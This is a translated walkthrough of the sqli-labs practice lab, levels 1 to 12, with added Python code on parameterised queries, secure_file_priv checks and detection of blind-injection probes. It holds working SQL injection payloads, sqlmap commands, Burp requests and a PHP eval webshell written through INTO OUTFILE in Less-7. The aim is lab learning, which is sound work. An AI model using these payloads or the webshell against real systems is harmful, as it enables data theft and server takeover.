sqli-labs-basic walkthrough notes

sqli-labs-basic clearance record handbook

Please credit the original link when reposting:
https://www.cnblogs.com/HAN91/p/14927407.html


Less-1

date:2020-11-16 21:29:27

Process

According to the hint on the page, "Please input the ID as parameter with numeric value", the injection point is id

sqlmap:

Dump databases:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 --dbs --batch
Dump tables:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security --tables --batch
Dump columns:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users --columns --batch
Dump column values:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users -C id,password,username --dump --batch

Data obtained; the other tables work the same way:
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

Manual injection:

First, cautiously try id=1

http://www.sqli-labs.com/Less-1/
?id=1

Oh ho, data is echoed back

Your Login name:Dumb
Your Password:Dumb

Use order by to find out how many columns are needed, but whatever number I order by, the response is the same...

http://www.sqli-labs.com/Less-1/
?id=2 order by 110

Many tries in between gave no response. I added a single quote to trigger an error and look at the SQL statement; I had assumed it was numeric, even though the hint said otherwise... so dumb!!!

http://www.sqli-labs.com/Less-1/
?id=1'
Output:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

order by shows that three columns are needed. Because closing the trailing single quote is a hassle, I just comment out the rest of the statement with # (URL-encoded %23) and do it my own way

http://www.sqli-labs.com/Less-1/
?id=1' order by 3 limit 1 %23
Output:
Your Login name:Dumb
Your Password:Dumb

http://www.sqli-labs.com/Less-1/
?id=1' order by 4 limit 1 %23
Output:
Unknown column '4' in 'order clause'

Three columns, but only two values are printed; naturally one of them is the id, so the first column can be anything and the last two are used to output the data we want. One pass through the usual procedure:

Dump databases: pull everything from MySQL's default information_schema database, joining the names with group_concat:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
Output:
The second column is the current database, security; the third column lists all databases on localhost

Dump tables:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema %23
Output:
Your Login name:emails,referers,uagents,users
Your Password:3

Dump columns:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23
Output:
Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
Your Password:3

Dump column values:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(concat_ws('--',id,username,password)),3 from users+%23
Output:
Your Login name:1--Dumb--Dumb,2--Angelina--I-kill-you,3--Dummy--p@ssword,4--secure--crappy,5--stupid--stupidity,6--superman--genious,7--batman--mob!le,8--admin--admin,9--admin1--admin1,10--admin2--admin2,11--admin3--admin3,12--dhakkan--dumbo,14--admin4--admin4
Your Password:3
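As an added example (not part of the original post or of sqli-labs), the Less-1 lookup `SELECT * FROM users WHERE id='$id' LIMIT 0,1` is rebuilt below in sqlite3 with a constructed copy of the lab's users table, once with the id pasted into the SQL text and once with it bound as a parameter; it assumes sqlite3's `--` comment in place of the page's `%23`, and shows why the quote probe, the order by probe and the union all only work against the concatenated form.

```python
"""Vulnerable concatenation versus a bound parameter for the Less-1 query.
Added example; the users rows are a constructed subset of the lab's table."""
import sqlite3

# Constructed sample of the lab's users table (first three rows only).
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]


def make_db() -> sqlite3.Connection:
    """In-memory database with the three-column users table the lab queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn: sqlite3.Connection, user_id: str):
    """The vulnerable shape: the parameter becomes part of the SQL text.
    Returns the first row, None, or the error text the page would echo back."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


def lookup_param(conn: sqlite3.Connection, user_id: str):
    """The hardened shape: same query, value bound as a parameter, so a quote
    or a union in the input is just characters compared against the id column."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


def demo() -> dict:
    """Run the page's probes against both shapes and collect the outcomes."""
    conn = make_db()
    probe = "1'"                               # the quote test from the page
    order4 = "1' order by 4 --"                # column-count probe: no 4th column
    union = "-1' union select 1,username,password from users --"
    return {
        "concat_normal": lookup_concat(conn, "1"),
        "concat_probe": lookup_concat(conn, probe),     # syntax error leaks
        "param_probe": lookup_param(conn, probe),       # simply no such id
        "concat_order4": lookup_concat(conn, order4),   # error reveals column count
        "concat_union": lookup_concat(conn, union),     # attacker-chosen row
        "param_union": lookup_param(conn, union),       # simply no such id
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:14} -> {result}")
```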

Summary

  1. Although I find closing the quote tedious, I still wanted to try it: closing it directly at the very end also works and does not raise a syntax error
http://www.sqli-labs.com/Less-1/
?id=1" order by 3 "

     Then why does everyone like to close with

?id=1' and '1'='1
  2. A visual way to understand the functions

    concat_ws() concatenates the values of one row

    group_concat() concatenates the values of one column

  3. My SQL is pretty weak; some syntax and functions I still have to look up on Baidu. In MySQL's information_schema I often mix up the table and column names, so during manual injection I still have to look up the exact names, which wastes a lot of time. I could memorize them, but after a while without writing them I forget again, and with so many databases the default tables all differ, so the answer is just more practice

  4. When sqlmap runs, it shows the corresponding payloads; some are written really complicated, supposedly for bypasses, but with a select in there it feels like nothing gets bypassed. One day, when I am no longer a newbie who can't even use a script, I'd like to read through the source code


Less-2

date: 2020-11-17 10:32:43

Process

Compared with Less-1 there are just two fewer quotes to close

sqlmap

Same as Less-1

Manual injection

Confirm that id is the injection point and that three columns are needed:

payload:http://www.sqli-labs.com/Less-2?id=1 order by 4
Output:Unknown column '4' in 'order clause'
payload:http://www.sqli-labs.com/Less-2?id=1 order by 3
Output:Your Login name:DumbYour Password:Dumb

Same procedure as Less-1:

Dump databases; the second column is changed to concatenate all database names:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
Dump the tables of the current database:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema
Dump columns:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
Dump column values:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(concat_ws('--',username,password)),3 from users

Summary

Sob, finally I don't have to consult the walkthrough guide for everything


Less-3

date:2020-11-17 11:00:04

Process

sqlmap

Same as Less-1

Manual injection

Add a single quote to trigger an error and see what exactly needs to be closed

payload:

http://www.sqli-labs.com/Less-3?id=1asdf'kkkk

Output: there is a parenthesis after the value that needs closing, and id is a string type:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'kkkk') LIMIT 0,1' at line 1

order by shows that the required column count is 3

payload:

http://www.sqli-labs.com/Less-3?id=-1') order by 4 --+
http://www.sqli-labs.com/Less-3?id=-1') order by 3 --+

Dump, dump, dump:

Dump databases; the second column is changed to concatenate all database names:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+
Dump the tables of the current database:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+
Dump columns:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
Dump column values:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

Summary

?id=1" actually returned data normally!!!

Because it became id=xx('1"'); nothing was closed at all. A bit dumb of me


Less-4

date:2020-11-17 11:25:45

Process

sqlmap

Same as Less-1

Manual injection

A double quote triggers an error, so ") %23+ can be appended directly to close it

payload:
http://www.sqli-labs.com/Less-4?id=1"
Output:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

After order by confirms three columns, fetch the data with union select

Dump databases; the second column is changed to concatenate all database names:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+
Dump the tables of the current database:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+
Dump columns:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
Dump column values:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

Summary

Nothing much to say


Less-5

date:2020-11-17 11:48:40

Process

sqlmap

Same as Less-1

Manual injection

A single quote triggers an error, payload

payload:
http://www.sqli-labs.com/Less-5?id=1'
Output:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

The first single quote in ''1'' LIMIT 0,1' is a real trap; I keep misreading it as part of the SQL statement

After closing the single quote, order by confirms that three columns are selected, but the page does not print the column values; apparently the backend only checks the result

payload:
http://www.sqli-labs.com/Less-5?id=1' order by 3 +%23+
Output:
You are in...........

Nothing useful found on the front end, so I looked up floor() error-based injection and got going

Database-dump payload

http://www.sqli-labs.com/Less-5?id=1' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'='1

Then it is the same procedure as before: just put the data you want inside the concat

Summary

  1. The error mechanism of select count(*) from test group by floor(rand(0)*2) is brilliant

    In short:

    floor(rand(0)*2) yields random 0s and 1s, but it is pseudo-random: 011011...

    When count(*) works together with group by, a temporary table is created with two columns (the key and the count)

    The floor expression evaluates to 0 the first time; no row with key 0 is found in the table, so a row has to be inserted, and during the insert the group by value is fetched again (i.e. the floor expression is evaluated once more, giving 1); 1 is obtained, inserted, and count(*) is set to 1.

    In other words one insert calls floor twice, so when 01 comes up later, 0 is not present, so 1 is inserted, but 1 already exists: error

  2. The payload was copied from sqlmap and modified; what I typed by hand kept giving syntax errors. I stared at it many times and saw nothing wrong, which felt unreasonable; looking at the error later, the select ... from after and needs an alias for the derived table (Every derived table must have its own alias), and the select ... from also needs to be wrapped in another pair of parentheses
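The double evaluation described in point 1 can be traced with a small model. This is an added model, not MySQL's code: it walks the page's pseudo-random prefix 0 1 1 0 1 1, evaluates the key once for the lookup and again for the insert, and raises where MySQL would raise its duplicate-key error; the `prefix` argument stands for the `CONCAT(database(), ...)` part that makes the error message carry the leaked value.

```python
"""Model of why COUNT(*) ... GROUP BY FLOOR(RAND(0)*2) raises a duplicate key.
Added example; it mirrors the explanation on the page, not MySQL's internals."""

# The page's pseudo-random prefix for FLOOR(RAND(0)*2): 0 1 1 0 1 1 ...
RAND0_PREFIX = [0, 1, 1, 0, 1, 1]


class DuplicateKeyError(Exception):
    """Stands in for MySQL error 1062 (Duplicate entry ... for key 'group_key')."""


def simulate_group_by(source_rows: int, prefix: str = "",
                      key_sequence=RAND0_PREFIX) -> dict:
    """Scan `source_rows` rows of the source table and build the temporary
    {key: count} table. The grouping key is evaluated once to look the row up
    and, when the row is new, evaluated a second time to perform the insert.
    Raises DuplicateKeyError on the row where the second draw collides."""
    draws = iter(key_sequence)
    table = {}
    for row in range(1, source_rows + 1):
        key = f"{prefix}{next(draws)}"          # first evaluation: the lookup
        if key in table:
            table[key] += 1                     # existing group: count goes up
            continue
        key = f"{prefix}{next(draws)}"          # second evaluation: the insert
        if key in table:
            # The inserted key already exists: this is the error the page uses,
            # and its message carries `prefix`, i.e. the value being extracted.
            raise DuplicateKeyError(
                f"row {row}: Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def rows_needed_to_fail(max_rows: int = 10) -> int:
    """Smallest source-table size that triggers the collision (0 if none)."""
    for n in range(1, max_rows + 1):
        try:
            simulate_group_by(n)
        except DuplicateKeyError:
            return n
    return 0


if __name__ == "__main__":
    print(simulate_group_by(2))                 # {'1': 2}: no error yet
    print("rows needed:", rows_needed_to_fail())  # 3
    try:
        simulate_group_by(3, prefix="security")
    except DuplicateKeyError as exc:
        print(exc)
```

With two source rows the draws are 0,1 (insert key 1) and 1 (count 2); the third row draws 0 then 1 again, and the insert of 1 collides, which is why the payload groups over a table with several rows such as INFORMATION_SCHEMA.PLUGINS.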


Less-6

date: 2020-11-17 15:50:40

Process

sqlmap

Same as Less-1

Manual injection

Entered the payload from Less-5 and found it no longer errors!

Cleverly I checked sqlmap and saw that it had just switched to closing a double quote, sigh, silly me

Payload to dump the current database:

http://www.sqli-labs.com/Less-6?id=1" AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'="1

CONCAT(payload,floor(rand(0)*2)) serves as the group by key

Summary

Nothing to summarize; I thought there would be something new to look at


Less-7

date:2020-11-17 16:09:39

Process

sqlmap

Same as Less-1

sqlmap used time-based blind injection; it ran for a while and then the connection dropped on its own, hilarious

Manual injection

Tried a few things; apparently the backend only checks the result

All SQL errors produce the same output:

You have an error in your SQL syntax

Normal output:You are in.... Use outfile......

For blind injection you binary-search the ASCII value of each character; even sqlmap said it couldn't take it

The normal output contains "use outfile......", which feels like a hint. For new things I search Baidu; alright, here I went straight to the walkthrough guide, and it really does write a file to get a shell......

So cool, let's do it by hand

To upload a one-liner webshell you need to know the path, so get the path from a level that echoes data

The basedir parameter specifies the installation path of MySQL

The datadir parameter specifies the path where MySQL's database files are stored

payload:

http://www.sqli-labs.com/Less-1/?id=-1' union select 1,@@datadir,@@basedir MYSQL %23+

Output; it is not the phpstudy path, because I am not using phpstudy's database at all...:

Your Login name:C:\ProgramData\MySQL\MySQL Server 5.5\Data\Your Password:C:/Program Files (x86)/MySQL/MySQL Server 5.5/

Try to write a PHP one-liner under the path obtained:

http://www.sqli-labs.com/Less-7/?id=1 union select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/ProgramData/MySQL/MySQL Server 5.5/Data/haha.php' %23+

But it kept erroring; I angrily ran it directly in mysql and saw the error:

[SQL] select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/haha.php'[Err] 1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Looked up the cause of the error:

Error when saving a desktop file into mysql:
The MySQL server is running with the --secure-file-pri option so it cannot execute this.
Cause:
MySQL's import/export paths have a default setting, secure-file-priv; when the path of the csv file passed in conflicts with the default path, an error is raised. secure-file-priv can take three kinds of value:
  1. secure_file_priv=null -- restricts mysqld so that no import or export is allowed
  2. secure_file_priv=/path/ -- restricts mysqld's imports and exports to the default /path/ directory
  3. secure_file_priv='' -- no restriction on mysqld's imports and exports

Querying with select @@secure_file_priv shows that secure_file_priv is null, that is, import and export are not allowed

So go to the MySQL installation directory and edit my.ini: under the mysqld section add secure_file_priv='', removing the restriction on import and export
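The three cases above decide whether an INTO OUTFILE ever reaches disk. As an added example (not from the page or from MySQL), the checker below reads `secure_file_priv` out of the `[mysqld]` section of a my.ini/my.cnf text, classifies it, and tells whether a given output path would be allowed; the two ini fragments are constructed, with `D:/mysql-files` as an assumed export directory, and the file paths in the demo are the ones the walkthrough uses.

```python
"""Classify secure_file_priv from a my.ini/my.cnf and check an outfile target.
Added example with constructed config fragments; not MySQL's own logic."""
import os
import re

# Constructed fragments: the setting the walkthrough switched to, and a
# restricted alternative with an assumed export directory.
WEAK_INI = """[client]
port=3306
[mysqld]
basedir=C:/Program Files (x86)/MySQL/MySQL Server 5.5/
secure_file_priv=''
"""
RESTRICTED_INI = """[mysqld]
secure_file_priv=D:/mysql-files
"""


def read_secure_file_priv(ini_text: str):
    """Return the raw secure_file_priv value from the [mysqld] section, or None
    when the option is absent (the page's install reported NULL in that case)."""
    section = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section != "mysqld" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().replace("-", "_").lower() == "secure_file_priv":
            return value.strip().strip("'\"")
    return None


def classify(value) -> str:
    """'disabled' (NULL/absent), 'unrestricted' (''), or 'restricted' (a path)."""
    if value is None or value.upper() == "NULL":
        return "disabled"        # no LOAD DATA / INTO OUTFILE at all
    if value == "":
        return "unrestricted"    # any path the mysqld user can write: the weak setting
    return "restricted"          # only inside the configured directory


def outfile_allowed(value, target_path: str) -> bool:
    """Would `SELECT ... INTO OUTFILE target_path` be permitted under `value`?"""
    state = classify(value)
    if state == "disabled":
        return False
    if state == "unrestricted":
        return True
    base = os.path.normcase(os.path.normpath(value))
    target = os.path.normcase(os.path.normpath(target_path))
    return target == base or target.startswith(base + os.sep) or target.startswith(base + "/")


def audit(ini_text: str, target_path: str) -> dict:
    """One-shot summary for a config text and a candidate outfile path."""
    value = read_secure_file_priv(ini_text)
    return {"value": value, "state": classify(value),
            "allowed": outfile_allowed(value, target_path)}


if __name__ == "__main__":
    print(audit(WEAK_INI, "D:/haha.php"))            # unrestricted, allowed
    print(audit(RESTRICTED_INI, "D:/haha.php"))      # restricted, not allowed
    print(audit(RESTRICTED_INI, "D:/mysql-files/export.csv"))
    print(audit("[mysqld]\nport=3306\n", "D:/haha.php"))  # absent: disabled
```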

While trying payloads,

?id=1 order by 111111 %23+ no error

?id=1' order by 111111 %23+ error

?id=1" order by 111111 %23+ no error

This shows there is a single quote to close

?id=1' order by 1 %23+ error

?id=1')) order by 3 %23+ no error

?id=1')) order by 4 %23+ error

Closed successfully, and three columns are needed

payload:

http://www.sqli-labs.com/Less-7?id=1')) union select '<?php @eval($_POST["haha"]); ?>',2,3 into outfile 'D:/haha.php' %23+

Although the output is still an error, the file has already been written to drive D (because I had already run this SQL statement in the database many times...)

But since my MySQL is not phpstudy's, I could not get phpstudy's path through the path echo, the file was not written into the phpstudy directory, so it could not be connected to or parsed?

Cleverly I decided to copy it manually into www

Connected successfully with AntSword

Also, to view database data you can change the output file in the payload above and then view the content of the output file in AntSword; the rest of the database dumping follows the same procedure as the previous levels, e.g. dumping the current database name:

http://www.sqli-labs.com/Less-7?id=1')) union select database(),2,3 into outfile 'D:/haha.php' %23+

Because logging into the database from the command line needs a password

Summary

  1. The difference between @ and @@ in MySQL

    @x is a user-defined variable (User variables are written as @var_name)

    @@x is a global or session variable (@@global @@session)

  2. The sadness of a newbie is needing to cheat to solve a problem, but the task the gods gave me is to finish it and learn it!


Less-8

date:2020-11-21 13:58:47

Process

sqlmap

Same as Less-1; looking at sqlmap's payload, it is blind injection too

Manual injection

After closing the single quote, order by 3 and order by 4 respectively: one gives normal output and the other gives nothing, which shows the single quote was closed successfully, order by executed, and three columns are needed. payload:

http://www.sqli-labs.com/Less-8?id=1' order by 3 %23+
http://www.sqli-labs.com/Less-8?id=1' order by 4 %23+

No data is echoed, so only blind injection is possible

Tried the outfile upload from level seven; the upload succeeded, connected with AntSword

Change of approach: blind injection. The title says boolean-based blind, so guess one character at a time. Cleverly I decided to determine the length first and then brute-force with Burp

The length() function obviously returns the length of its argument

The substr(a,b,c) function obviously cuts string a, taking c characters starting at position b

payload:

http://www.sqli-labs.com/Less-8?id=1' and (select length(database()))=8 %23+

=8 gives normal output, so the current database name is 8 characters long

Open Burp, select Intruder

The attack type can be sniper or cluster bomb, both are convenient; for the wordlist I just dragged out 1 to 127 in Excel..., typing them one by one would be too tiring (haha, turns out Burp has a built-in numbers list, how embarrassing ヾ(=゚・゚=)ノ喵♪)

Guess each character of the database name from 1 to 127 one by one, and find the correct ASCII value from the difference in response length:

GET /Less-8/?id=1%27%20and%20(select%20ascii(substr(database(),§1§,1)))=§115§%20%23+ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

I won't include the Burp screenshots here, too much hassle; with the cartesian product it sent over a thousand requests just to get the current database name. To dump other things, just tweak the payload above:

request payload1 payload2 status timeout error length
0 200 false false 950
787 3 99 200 false false 950
802 2 101 200 false false 950
838 6 105 200 false false 950
909 5 114 200 false false 950
913 1 115 200 false false 950
927 7 116 200 false false 950
932 4 117 200 false false 950
968 8 121 200 false false 950
1 1 1 200 false false 966
2 2 1 200 false false 966
3 3 1 200 false false 966
4 4 1 200 false false 966
5 5 1 200 false false 966
6 6 1 200 false false 966

Summary

Doing blind injection by hand one character at a time is very time-consuming; exhausting

It's great to have sqlmap


Less-9

date:2020-11-21 15:10:01

Process

sqlmap

Same as Less-1

Manual injection

Whatever you enter, it outputs normally; the id entered clearly isn't in the database and it still says you are in, bad user experience:

Welcome    DhakkanYou are in...........

Use the if() function for time-based blind injection; once the single quote is closed, it just keeps sleeping

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((1=2),1,sleep(2333)) %23

Similar to boolean-based blind injection, but the judgment is made from how long the server takes to respond. Let's go

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((length(database())=8),sleep(2333),1) %23

Determined that database() is 8 characters long; again on to Burp:

GET /Less-9/?id=1%27%20and%20if((ascii(substr(database(),§1§,1))=§115§),sleep(11),1)%20%23 HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

Burp's results; from the ASCII values you can work out the current database name:

request payload1 payload2 status timeout error length
0 200 false false 988
787 3 99 200 false false 988
802 2 101 200 false false 988
838 6 105 200 false false 988
909 5 114 200 false false 988
913 1 115 200 false false 988
927 7 116 200 false false 988
932 4 117 200 false false 988
968 8 121 200 false false 988
1 1 1 200 false false 951
2 2 1 200 false false 951
3 3 1 200 false false 951
4 4 1 200 false false 951

Summary

Actually, to save time you can look at the database naming conventions to narrow down which characters need testing; that saves some time when testing a large number of values
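The Intruder sweeps in Less-8 and Less-9 leave a very recognisable trace: hundreds of requests from one client that differ only in the position and ASCII value inside `ascii(substr(database(),N,1))=M`, or that carry `sleep(...)`. As an added detection example (not from the post), the scanner below parses constructed access-log lines of that shape, percent-decodes the request target, matches the probe signatures, and flags a client once its probe count reaches a burst threshold; the log lines, IP addresses and the threshold of 5 are constructed for the example.

```python
"""Flag boolean/time-based blind-injection probing in web access logs.
Added example; the sample log lines are constructed to mirror Less-8/Less-9."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One "combined"-style log line: ip ident user [ts] "METHOD URL PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Signatures taken from the probes used in Less-8 (boolean) and Less-9 (time-based).
SIGNATURES = {
    "char_probe": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "time_probe": re.compile(r"\bsleep\s*\(", re.I),
    "length_probe": re.compile(r"\blength\s*\(\s*database\s*\(", re.I),
}


def classify_request(url: str) -> list:
    """Percent-decode the request target and list the signatures it matches."""
    decoded = unquote_plus(url)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(log_lines, burst_threshold: int = 5) -> dict:
    """Per-client summary: number of probe requests, which kinds were seen, and
    whether the count reached the burst threshold a 1..127 sweep exceeds."""
    per_ip = defaultdict(lambda: {"probes": 0, "kinds": set(), "flagged": False})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a line in the expected format
        kinds = classify_request(m.group("url"))
        if not kinds:
            continue                      # ordinary request, nothing to record
        entry = per_ip[m.group("ip")]
        entry["probes"] += 1
        entry["kinds"].update(kinds)
        entry["flagged"] = entry["probes"] >= burst_threshold
    return dict(per_ip)


def _probe_line(ip: str, pos: int, val: int) -> str:
    """Constructed log line shaped like one Intruder request from Less-8."""
    url = (f"/Less-8/?id=1%27%20and%20(select%20ascii(substr(database(),{pos},1)))"
           f"={val}%20%23+")
    return f'{ip} - - [21/Nov/2020:14:02:{pos:02d} +0800] "GET {url} HTTP/1.1" 200 950'


# Constructed sample log: a benign client, a single time probe, and a burst.
SAMPLE_LOG = [
    '10.0.0.9 - - [21/Nov/2020:14:01:00 +0800] "GET /Less-8/?id=1 HTTP/1.1" 200 966',
    '10.0.0.7 - - [21/Nov/2020:14:01:30 +0800] "GET /Less-9/?id=1%27%20and%20if((1=2),1,sleep(2333))%20%23 HTTP/1.1" 200 988',
] + [
    _probe_line("10.0.0.5", pos, val)
    for pos, val in [(1, 115), (1, 116), (2, 99), (2, 101), (3, 99), (4, 117), (5, 114), (6, 105)]
]


if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, entry["probes"], sorted(entry["kinds"]), "FLAGGED" if entry["flagged"] else "")
```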


Less-10

date:2020-11-21 15:55:10

Process

sqlmap

Same as Less-1

Manual injection

Compared with Less-9, the single-quote closure just becomes a double-quote closure

With this payload the server goes to sleep:

http://www.sqli-labs.com/Less-10?id=1" and if((1=1),sleep(2333),1) %23+

The rest of the procedure is the same as Less-9

Summary

Meeting this level, I don't know whether to be happy or to be happy


Less-11

date:2020-11-21 16:23:25

Process

Having finished the time-based blind levels, I saw this one and my eyes lit up! Finally a different kind of level hahahahaha hic

sqlmap

For POST requests sqlmap can use the forms parameter

Here the --forms parameter is used and all the databases come out directly:

py sqlmap.py -u http://www.sqli-labs.com/Less-11 --forms --dbs --batch

For dumping column values afterwards just change the parameters, same as Less-1

Manual injection

Seeing a login form, I wanted to log in with admin/123456 (it failed! annoying!)

Capturing the request shows it is a POST request, so parameters can't be appended to the URL as before; just inject in the input boxes then, haha

payload; there is a space at the end of the username, because without it the comment marker joins the characters that follow and no longer works as a comment:

Username :    admin' or 1=1 -- Password :    123456

Output:

Your Login name:DumbYour Password:Dumb

Data is echoed, nice

Capture with Burp, modify the parameters directly, and confirm with order by that two columns are needed:

POST /Less-11/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-11/
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin%27 order by 2+--+&passwd=&submit=Submit

Output; there really is an admin/admin...:

<br>Your Login name:admin<br>Your Password:admin<br>

Database-dump payload:

uname=zhatian%27 union select 1,group_concat(schema_name) from information_schema.schemata+--+&passwd=&submit=Submit

Output:

<br>Your Login name:1<br>Your Password:information_schema,bookstore,challenges,dvwa,edusys,exam,fresh,hotel,hy,hy2,mysql,news,pentest,performance_schema,pikachu,security,store,student,test,vote<br>

Table-dump payload:

uname=zhatian%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()+--+&passwd=&submit=Submit

Output:

<br>Your Login name:1<br>Your Password:emails,referers,uagents,users<br

Dump columns:

uname=zhatian%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'+--+&passwd=&submit=Submit

Output:

<br>Your Login name:1<br>Your Password:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password<br>

Dump column values:

uname=zhatian%27 union select 1,group_concat(concat_ws('--',username,password)) from users +--+&passwd=&submit=Submit

Output:

<br>Your Login name:1<br>Your Password:Dumb--Dumb,Angelina--I-kill-you,Dummy--p@ssword,secure--crappy,stupid--stupidity,superman--genious,batman--mob!le,admin--admin,admin1--admin1,admin2--admin2,admin3--admin3,dhakkan--dumbo,admin4--admin4<br

The rest is routine

Summary

For POST requests sqlmap can use the forms parameter to grab the form directly; you can also use the -r parameter to read a request file, or test via the --data parameter; look up the specifics on Baidu as needed

The file read by -r can be captured with Burp: right-click, copy to file, and it exports a txt file directly


Less-12

date:2020-11-21 17:21:22

Process

sqlmap

Same as Less-11

Manual injection

Capture with Burp

Found that a double quote triggers an error, payload:

